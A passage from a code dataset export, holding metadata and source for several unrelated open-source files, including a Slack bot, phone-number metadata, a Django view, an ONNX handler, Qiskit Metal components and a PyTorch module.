"keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "2_GPU_P100_DEDICATED",
"hardwareGenericComponentModel": {
"capacity": "16",
"id": 849,
"hardwareComponentType": {
"id": 20,
"keyName": "GPU"
}
},
"categories": [{
"categoryCode": "dedicated_host_ram"
}, {
"capacity": "2",
"description": "2 x 2.0 GHz or higher Cores",
"keyName": "GUEST_CORES_2",
"attributes": [
{
"id": 8261,
"attributeTypeKeyName": "ORDER_SAVES_USAGE_FEES"
}
],
"itemCategory": {
"categoryCode": "guest_core",
"id": 80
}}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}]}
| true
| true
|
f705b13cfc1cd5bcb7ec174f96d2acb2a724ac65
| 41
|
py
|
Python
|
lectures/code/mr_map.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | 4
|
2015-08-10T17:46:55.000Z
|
2020-04-18T21:09:03.000Z
|
lectures/code/mr_map.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | null | null | null |
lectures/code/mr_map.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | 2
|
2019-04-24T03:31:02.000Z
|
2019-05-13T07:36:06.000Z
|
f = lambda x: x + 1
map(f, [1, 2, 3, 4])
| 13.666667
| 20
| 0.439024
|
f = lambda x: x + 1
map(f, [1, 2, 3, 4])
| true
| true
|
f705b2b334785f83ba36f8f36add6d246c62f860
| 2,257
|
py
|
Python
|
slackbot_te/slackpi.py
|
wray/slack_em
|
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
|
[
"MIT"
] | null | null | null |
slackbot_te/slackpi.py
|
wray/slack_em
|
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
|
[
"MIT"
] | null | null | null |
slackbot_te/slackpi.py
|
wray/slack_em
|
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
|
[
"MIT"
] | null | null | null |
import os
import time
from slackclient import SlackClient
import bot_id
# Instructor and student imports
import wray.slacklib
import joe.slacklib
import chris.slacklib
# constants
try:
AT_BOT = "<@" + bot_id.get_id() + ">"
except TypeError:
pass
# instantiate client
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
def handle_command(command, channel):
"""
Receives commands directed at the bot and determines if they
are valid commands. If so, then acts on the commands. If not,
returns back what it needs for clarification.
Need to determine an algorithm for student overloaded commands.
"""
response = wray.slacklib.handle_command(command)
response += joe.slacklib.handle_command(command)
response += chris.slacklib.handle_command(command)
print("["+response+"]")
if len(response) == 0:
response = "Why thank you, I don't know what else to say."
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
def parse_slack_output(slack_rtm_output):
"""
The Slack Real Time Messaging API is an events firehose.
this parsing function returns None unless a message is
directed at the Bot, based on its ID.
"""
output_list = slack_rtm_output
print(output_list)
if output_list and len(output_list) > 0:
for output in output_list:
if output and 'text' in output and AT_BOT in output['text']:
# return text after the @ mention, whitespace removed
return output['text'].split(AT_BOT)[1].strip().lower(), \
output['channel']
return None, None
if __name__ == "__main__":
READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose
if slack_client.rtm_connect():
print("StarterBot connected and running!")
while True:
command, channel = parse_slack_output(slack_client.rtm_read())
print(command,channel)
if command and channel:
handle_command(command, channel)
time.sleep(READ_WEBSOCKET_DELAY)
else:
print("Connection failed. Invalid Slack token or bot ID?")
| 30.5
| 75
| 0.658839
|
import os
import time
from slackclient import SlackClient
import bot_id
import wray.slacklib
import joe.slacklib
import chris.slacklib
try:
AT_BOT = "<@" + bot_id.get_id() + ">"
except TypeError:
pass
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
def handle_command(command, channel):
response = wray.slacklib.handle_command(command)
response += joe.slacklib.handle_command(command)
response += chris.slacklib.handle_command(command)
print("["+response+"]")
if len(response) == 0:
response = "Why thank you, I don't know what else to say."
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
def parse_slack_output(slack_rtm_output):
output_list = slack_rtm_output
print(output_list)
if output_list and len(output_list) > 0:
for output in output_list:
if output and 'text' in output and AT_BOT in output['text']:
# return text after the @ mention, whitespace removed
return output['text'].split(AT_BOT)[1].strip().lower(), \
output['channel']
return None, None
if __name__ == "__main__":
READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose
if slack_client.rtm_connect():
print("StarterBot connected and running!")
while True:
command, channel = parse_slack_output(slack_client.rtm_read())
print(command,channel)
if command and channel:
handle_command(command, channel)
time.sleep(READ_WEBSOCKET_DELAY)
else:
print("Connection failed. Invalid Slack token or bot ID?")
| true
| true
|
f705b48143f78825bb5ce93336c2b928cbc14651
| 2,601
|
py
|
Python
|
venv/Lib/site-packages/phonenumbers/data/region_PH.py
|
HarisHijazi/mojarnik-server
|
bee7266609cc0bca7cc6a4059086fc0ba7219a33
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/phonenumbers/data/region_PH.py
|
HarisHijazi/mojarnik-server
|
bee7266609cc0bca7cc6a4059086fc0ba7219a33
|
[
"MIT"
] | 2
|
2021-06-22T01:34:18.000Z
|
2021-06-22T01:40:28.000Z
|
venv/Lib/site-packages/phonenumbers/data/region_PH.py
|
HarisHijazi/mojarnik-server
|
bee7266609cc0bca7cc6a4059086fc0ba7219a33
|
[
"MIT"
] | null | null | null |
"""Auto-generated file, do not edit by hand. PH metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_PH = PhoneMetadata(id='PH', country_code=63, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}|(?:2|[89]\\d{4})\\d{5}|[2-8]\\d{8}|[28]\\d{7}', possible_length=(6, 8, 9, 10, 11, 12, 13), possible_length_local_only=(4, 5, 7)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:(?:2[3-8]|3[2-68]|4[2-9]|5[2-6]|6[2-58]|7[24578])\\d{3}|88(?:22\\d\\d|42))\\d{4}|2\\d{5}(?:\\d{2})?|8[2-8]\\d{7}', example_number='21234567', possible_length=(6, 8, 9, 10), possible_length_local_only=(4, 5, 7)),
mobile=PhoneNumberDesc(national_number_pattern='(?:8(?:1[37]|9[5-8])|9(?:0[5-9]|1[0-24-9]|[2357]\\d|4[2-9]|6[0-35-9]|8[189]|9[1-9]))\\d{7}', example_number='9051234567', possible_length=(10,)),
toll_free=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}', example_number='180012345678', possible_length=(11, 12, 13)),
national_prefix='0',
national_prefix_for_parsing='0',
number_format=[NumberFormat(pattern='(\\d)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d)(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{4})(\\d{4,6})', format='\\1 \\2', leading_digits_pattern=['3(?:23|39|46)|4(?:2[3-6]|[35]9|4[26]|76)|544|88[245]|(?:52|64|86)2', '3(?:230|397|461)|4(?:2(?:35|[46]4|51)|396|4(?:22|63)|59[347]|76[15])|5(?:221|446)|642[23]|8(?:622|8(?:[24]2|5[13]))'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{5})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['346|4(?:27|9[35])|883', '3469|4(?:279|9(?:30|56))|8834'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d)(\\d{4})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[3-7]|8[2-8]'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[89]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{4})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['1']),
NumberFormat(pattern='(\\d{4})(\\d{1,2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['1'])])
| 130.05
| 325
| 0.618608
|
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_PH = PhoneMetadata(id='PH', country_code=63, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}|(?:2|[89]\\d{4})\\d{5}|[2-8]\\d{8}|[28]\\d{7}', possible_length=(6, 8, 9, 10, 11, 12, 13), possible_length_local_only=(4, 5, 7)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:(?:2[3-8]|3[2-68]|4[2-9]|5[2-6]|6[2-58]|7[24578])\\d{3}|88(?:22\\d\\d|42))\\d{4}|2\\d{5}(?:\\d{2})?|8[2-8]\\d{7}', example_number='21234567', possible_length=(6, 8, 9, 10), possible_length_local_only=(4, 5, 7)),
mobile=PhoneNumberDesc(national_number_pattern='(?:8(?:1[37]|9[5-8])|9(?:0[5-9]|1[0-24-9]|[2357]\\d|4[2-9]|6[0-35-9]|8[189]|9[1-9]))\\d{7}', example_number='9051234567', possible_length=(10,)),
toll_free=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}', example_number='180012345678', possible_length=(11, 12, 13)),
national_prefix='0',
national_prefix_for_parsing='0',
number_format=[NumberFormat(pattern='(\\d)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d)(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{4})(\\d{4,6})', format='\\1 \\2', leading_digits_pattern=['3(?:23|39|46)|4(?:2[3-6]|[35]9|4[26]|76)|544|88[245]|(?:52|64|86)2', '3(?:230|397|461)|4(?:2(?:35|[46]4|51)|396|4(?:22|63)|59[347]|76[15])|5(?:221|446)|642[23]|8(?:622|8(?:[24]2|5[13]))'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{5})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['346|4(?:27|9[35])|883', '3469|4(?:279|9(?:30|56))|8834'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d)(\\d{4})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[3-7]|8[2-8]'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[89]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{4})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['1']),
NumberFormat(pattern='(\\d{4})(\\d{1,2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['1'])])
| true
| true
|
f705b5f35286918ebf4f6eb85dc49797c87f040f
| 2,375
|
py
|
Python
|
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
|
PacktPublishing/Django-3-Web-Development-Cookbook
|
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
|
[
"MIT"
] | 159
|
2019-11-13T14:11:39.000Z
|
2022-03-24T05:47:10.000Z
|
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
|
PacktPublishing/Django-3-Web-Development-Cookbook
|
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
|
[
"MIT"
] | 34
|
2019-11-06T08:32:48.000Z
|
2022-01-14T11:31:29.000Z
|
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
|
PacktPublishing/Django-3-Web-Development-Cookbook
|
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
|
[
"MIT"
] | 103
|
2019-08-15T21:35:26.000Z
|
2022-03-20T05:29:11.000Z
|
# -*- coding: UTF-8 -*-
from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.utils.timezone import now as tz_now
@login_required
def start_page(request):
# dummy view to illustrate all custom template filters and tags
obj = {
"created": tz_now() - timedelta(days=3),
"content": f"""
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>
<figure>
<img src="{settings.STATIC_URL}site/img/logo.svg" alt="" />
<figcaption>Logo</figcaption>
</figure>
<p>Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?</p>
""",
"website": "https://docs.djangoproject.com/en/dev/howto/custom-template-tags/",
"content_to_parse": u"""
{% if request.user.is_authenticated %}
Hello, {{ request.user.username }}!
{% else %}
Hello anonymous visitor!
{% endif %}
""",
}
return render(request, "index.html", {
"object": obj,
})
| 67.857143
| 880
| 0.722947
|
from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.utils.timezone import now as tz_now
@login_required
def start_page(request):
obj = {
"created": tz_now() - timedelta(days=3),
"content": f"""
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>
<figure>
<img src="{settings.STATIC_URL}site/img/logo.svg" alt="" />
<figcaption>Logo</figcaption>
</figure>
<p>Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?</p>
""",
"website": "https://docs.djangoproject.com/en/dev/howto/custom-template-tags/",
"content_to_parse": u"""
{% if request.user.is_authenticated %}
Hello, {{ request.user.username }}!
{% else %}
Hello anonymous visitor!
{% endif %}
""",
}
return render(request, "index.html", {
"object": obj,
})
| true
| true
|
f705b6a65b0a1a3cce1c1b27d5be5e9b86cb5570
| 2,458
|
py
|
Python
|
python/athena/onnx/handler.py
|
sj1104/Het
|
81b7e9f0f593108db969fc46a1af3df74b825230
|
[
"Apache-2.0"
] | 2
|
2021-12-05T07:11:04.000Z
|
2021-12-15T07:53:48.000Z
|
python/athena/onnx/handler.py
|
sj1104/Het
|
81b7e9f0f593108db969fc46a1af3df74b825230
|
[
"Apache-2.0"
] | null | null | null |
python/athena/onnx/handler.py
|
sj1104/Het
|
81b7e9f0f593108db969fc46a1af3df74b825230
|
[
"Apache-2.0"
] | 3
|
2021-04-01T22:39:13.000Z
|
2021-04-21T11:51:57.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import inspect
from athena.onnx import constants
class athena_op:
_OPSETS = collections.OrderedDict()
_MAPPING = None
def __init__(self, name,onnx_op=None, domain=constants.ONNX_DOMAIN, **kwargs):
if not isinstance(name, list):
name = [name]
self.name = name
if not isinstance(onnx_op,list):
onnx_op=[onnx_op]*len(name)
self.onnx_op=onnx_op
self.domain = domain
self.kwargs = kwargs
def __call__(self, func):
opset = athena_op._OPSETS.get(self.domain)
if not opset:
opset = []
athena_op._OPSETS[self.domain] = opset
for k, v in inspect.getmembers(func, inspect.ismethod):
if k.startswith("version_"):
version = int(k.replace("version_", ""))
while version >= len(opset):
opset.append({})
opset_dict = opset[version]
for i,name in enumerate(self.name):
opset_dict[name] = (v,self.onnx_op[i], self.kwargs)
return func
@staticmethod
def get_opsets():
return athena_op._OPSETS
@staticmethod
def create_mapping(max_onnx_opset_version):
mapping = {constants.ONNX_DOMAIN: max_onnx_opset_version}
ops_mapping = {}
for domain, opsets in athena_op.get_opsets().items():
for target_opset, op_map in enumerate(opsets):
m = mapping.get(domain)
if m:
if target_opset <= m and op_map:
ops_mapping.update(op_map)
athena_op._MAPPING = ops_mapping
return ops_mapping
@staticmethod
def find_effective_op(name):
"""Find the effective version of an op create_mapping.
This is used if we need to compose ops from other ops where we'd need to find the
op that is doing to be used in the final graph, for example there is a custom op
that overrides a onnx op ...
:param name: The operator name.
"""
map_info = athena_op._MAPPING.get(name)
if map_info is None:
return None
return map_info
| 29.97561
| 92
| 0.6131
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import inspect
from athena.onnx import constants
class athena_op:
_OPSETS = collections.OrderedDict()
_MAPPING = None
def __init__(self, name,onnx_op=None, domain=constants.ONNX_DOMAIN, **kwargs):
if not isinstance(name, list):
name = [name]
self.name = name
if not isinstance(onnx_op,list):
onnx_op=[onnx_op]*len(name)
self.onnx_op=onnx_op
self.domain = domain
self.kwargs = kwargs
def __call__(self, func):
opset = athena_op._OPSETS.get(self.domain)
if not opset:
opset = []
athena_op._OPSETS[self.domain] = opset
for k, v in inspect.getmembers(func, inspect.ismethod):
if k.startswith("version_"):
version = int(k.replace("version_", ""))
while version >= len(opset):
opset.append({})
opset_dict = opset[version]
for i,name in enumerate(self.name):
opset_dict[name] = (v,self.onnx_op[i], self.kwargs)
return func
@staticmethod
def get_opsets():
return athena_op._OPSETS
@staticmethod
def create_mapping(max_onnx_opset_version):
mapping = {constants.ONNX_DOMAIN: max_onnx_opset_version}
ops_mapping = {}
for domain, opsets in athena_op.get_opsets().items():
for target_opset, op_map in enumerate(opsets):
m = mapping.get(domain)
if m:
if target_opset <= m and op_map:
ops_mapping.update(op_map)
athena_op._MAPPING = ops_mapping
return ops_mapping
@staticmethod
def find_effective_op(name):
map_info = athena_op._MAPPING.get(name)
if map_info is None:
return None
return map_info
| true
| true
|
f705b7c9ba1ebdfedca5661e5e709e360e52da9e
| 4,993
|
py
|
Python
|
tutorials/resources/my429_qcomponents.py
|
TomVethaak/qiskit-metal
|
0fd3049b16a2b28dc6890b696d67329a91da70b9
|
[
"Apache-2.0"
] | 167
|
2021-03-17T20:35:17.000Z
|
2022-03-31T13:25:04.000Z
|
tutorials/resources/my429_qcomponents.py
|
TomVethaak/qiskit-metal
|
0fd3049b16a2b28dc6890b696d67329a91da70b9
|
[
"Apache-2.0"
] | 307
|
2021-03-17T14:07:43.000Z
|
2022-03-23T14:22:20.000Z
|
tutorials/resources/my429_qcomponents.py
|
TomVethaak/qiskit-metal
|
0fd3049b16a2b28dc6890b696d67329a91da70b9
|
[
"Apache-2.0"
] | 122
|
2021-03-17T14:21:24.000Z
|
2022-03-18T10:09:38.000Z
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
from qiskit_metal import draw, Dict
from qiskit_metal.qlibrary.core import QComponent
class MyQComponent1(QComponent):
"""Demonstration1 - Straight segment with variable width/length"""
### def __init__() <- comes from QComponent
### Initiaizes base variables such as self.id, self.name and self.options
### Also launches the first execution of make()
### def rebuild() <- comes from QComponent
### Clear output from previous runs of make() (geom/pin/net) and re-runs it
def make(self):
"""calculates the geometries of the QComponent"""
rect = draw.rectangle(0.5, 0.1, 0, 0) #width, height, pos_x, pos_y
# add_geometry() expects shapely, thus the use of drawn module above
self.add_qgeometry('poly', {'my_polygon': rect},
layer=1,
subtract=False)
self.add_pin('in', rect.exterior.coords[:-3:-1],
0.1) #name, tangent, width
class MyQComponent2(QComponent):
"""Demonstration2 - Straight segment with variable width/length"""
# Your knobs to modify the cell behavior
default_options = Dict(width='0.5mm',
height='0.1mm',
pos_x='0mm',
pos_y='0mm',
layer='1')
"""Default drawing options"""
def make(self):
"""calculates the geometries of the QComponent"""
p = self.parse_options(
) # short-handle alias for the options interpreter
rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y)
self.add_qgeometry('poly', {'my_polygon': rect},
layer=p.layer,
subtract=False)
self.add_pin('in', rect.exterior.coords[:-3:-1], p.height)
class MyQComponent3(QComponent):
"""Demonstration2 - Straight segment with variable width/length"""
default_options = Dict(width='0.5mm',
height='0.1mm',
pos_x='0mm',
pos_y='0mm',
layer='1')
"""Default drawing options"""
# Name prefix of component + import of renderer-specific default_options
component_metadata = Dict(
short_name='Trace',
_qgeometry_table_path='False', #wirebonds
_qgeometry_table_poly='True',
_qgeometry_table_junction='False') #gds imports and analysis inputs
"""Component metadata"""
def make(self):
"""calculates the geometries of the QComponent"""
p = self.parse_options() # short-handle alias. Options interpreter
rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y)
self.add_qgeometry('poly', {'my_polygon': rect},
layer=p.layer,
subtract=False)
self.add_pin('in', rect.exterior.coords[:-3:-1], p.height)
class MyQComponent4(QComponent):
"""Demonstration3 - Straight segment with variable width/length"""
default_options = Dict(width='0.5mm',
height='0.1mm',
gap='0.02mm',
pos_x='0mm',
pos_y='0mm',
layer='1')
"""Default drawing options"""
# Name prefix of component + import of renderer-specific default_options
component_metadata = Dict(
short_name='Trace',
_qgeometry_table_path='True', #wirebonds
_qgeometry_table_poly='False',
_qgeometry_table_junction='False') #gds
"""Component metadata"""
def make(self):
"""calculates the geometries of the QComponent"""
p = self.parse_options()
line = draw.LineString([(-p.width / 2, 0), (p.width / 2, 0)])
line = draw.translate(line, p.pos_x, p.pos_y)
self.add_qgeometry('path', {'trace': line},
width=p.height,
layer=p.layer,
subtract=False)
line2 = draw.LineString([((-p.width / 2) - 2 * p.gap, 0),
((p.width / 2) + 2 * p.gap, 0)])
line2 = draw.translate(line2, p.pos_x, p.pos_y)
self.add_qgeometry('path', {'cut': line2},
width=p.height + 2 * p.gap,
layer=p.layer,
subtract=True)
self.add_pin('in', line.coords[::-1], p.height, input_as_norm=True)
| 38.705426
| 81
| 0.567795
|
from qiskit_metal import draw, Dict
from qiskit_metal.qlibrary.core import QComponent
class MyQComponent1(QComponent):
er='1')
def make(self):
p = self.parse_options(
)
rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y)
self.add_qgeometry('poly', {'my_polygon': rect},
layer=p.layer,
subtract=False)
self.add_pin('in', rect.exterior.coords[:-3:-1], p.height)
class MyQComponent3(QComponent):
default_options = Dict(width='0.5mm',
height='0.1mm',
pos_x='0mm',
pos_y='0mm',
layer='1')
component_metadata = Dict(
short_name='Trace',
_qgeometry_table_path='False',
_qgeometry_table_poly='True',
_qgeometry_table_junction='False')
def make(self):
p = self.parse_options()
rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y)
self.add_qgeometry('poly', {'my_polygon': rect},
layer=p.layer,
subtract=False)
self.add_pin('in', rect.exterior.coords[:-3:-1], p.height)
class MyQComponent4(QComponent):
default_options = Dict(width='0.5mm',
height='0.1mm',
gap='0.02mm',
pos_x='0mm',
pos_y='0mm',
layer='1')
component_metadata = Dict(
short_name='Trace',
_qgeometry_table_path='True',
_qgeometry_table_poly='False',
_qgeometry_table_junction='False')
def make(self):
p = self.parse_options()
line = draw.LineString([(-p.width / 2, 0), (p.width / 2, 0)])
line = draw.translate(line, p.pos_x, p.pos_y)
self.add_qgeometry('path', {'trace': line},
width=p.height,
layer=p.layer,
subtract=False)
line2 = draw.LineString([((-p.width / 2) - 2 * p.gap, 0),
((p.width / 2) + 2 * p.gap, 0)])
line2 = draw.translate(line2, p.pos_x, p.pos_y)
self.add_qgeometry('path', {'cut': line2},
width=p.height + 2 * p.gap,
layer=p.layer,
subtract=True)
self.add_pin('in', line.coords[::-1], p.height, input_as_norm=True)
| true
| true
|
f705b7eb5329fb67c4342d7f6f4f2089a9062d8f
| 1,324
|
py
|
Python
|
torchfes/colvar/fix.py
|
AkihideHayashi/torchfes1
|
83f01525e6071ffd7a884c8e108f9c25ba2b009b
|
[
"MIT"
] | null | null | null |
torchfes/colvar/fix.py
|
AkihideHayashi/torchfes1
|
83f01525e6071ffd7a884c8e108f9c25ba2b009b
|
[
"MIT"
] | null | null | null |
torchfes/colvar/fix.py
|
AkihideHayashi/torchfes1
|
83f01525e6071ffd7a884c8e108f9c25ba2b009b
|
[
"MIT"
] | null | null | null |
import math
from typing import Dict, Union, List
import torch
from torch import nn, Tensor
from .. import properties as p
def fix_msk(mol: Dict[str, Tensor], idx: Tensor):
_, atm, dim = mol[p.pos].size()
msk = torch.zeros([atm, dim], dtype=torch.bool, device=idx.device)
msk[idx, :] = True
return msk
class Fix(nn.Module):
idx: Tensor
def __init__(self, idx: Union[Tensor, List[int]]):
super().__init__()
if isinstance(idx, list):
idx = torch.tensor(idx)
self.register_buffer('idx', idx)
def forward(self, mol: Dict[str, Tensor]):
out = mol.copy()
msk = fix_msk(mol, self.idx)[None, :, :]
if p.fix_msk not in out:
out[p.fix_msk] = msk
else:
out[p.fix_msk] = out[p.fix_msk] | msk
return out
class FixGen(nn.Module):
pbc: Tensor
idx: Tensor
def __init__(self, idx: Union[Tensor, List[int]], num_dim: int):
super().__init__()
if isinstance(idx, list):
idx = torch.tensor(idx, dtype=torch.long)
n = idx.numel() * num_dim
self.register_buffer('idx', idx)
self.register_buffer('pbc', torch.ones(n) * math.inf)
def forward(self, mol: Dict[str, Tensor]):
msk = fix_msk(mol, self.idx)
return mol[p.pos][:, msk]
| 27.020408
| 70
| 0.586858
|
import math
from typing import Dict, Union, List
import torch
from torch import nn, Tensor
from .. import properties as p
def fix_msk(mol: Dict[str, Tensor], idx: Tensor):
_, atm, dim = mol[p.pos].size()
msk = torch.zeros([atm, dim], dtype=torch.bool, device=idx.device)
msk[idx, :] = True
return msk
class Fix(nn.Module):
idx: Tensor
def __init__(self, idx: Union[Tensor, List[int]]):
super().__init__()
if isinstance(idx, list):
idx = torch.tensor(idx)
self.register_buffer('idx', idx)
def forward(self, mol: Dict[str, Tensor]):
out = mol.copy()
msk = fix_msk(mol, self.idx)[None, :, :]
if p.fix_msk not in out:
out[p.fix_msk] = msk
else:
out[p.fix_msk] = out[p.fix_msk] | msk
return out
class FixGen(nn.Module):
pbc: Tensor
idx: Tensor
def __init__(self, idx: Union[Tensor, List[int]], num_dim: int):
super().__init__()
if isinstance(idx, list):
idx = torch.tensor(idx, dtype=torch.long)
n = idx.numel() * num_dim
self.register_buffer('idx', idx)
self.register_buffer('pbc', torch.ones(n) * math.inf)
def forward(self, mol: Dict[str, Tensor]):
msk = fix_msk(mol, self.idx)
return mol[p.pos][:, msk]
| true
| true
|
f705b8a080b3d7d64d5acef4a26a5ac0ae6a0be5
| 675
|
py
|
Python
|
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
|
akathpal/UMD-CMSC733-ComputerVision
|
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
|
[
"MIT"
] | 1
|
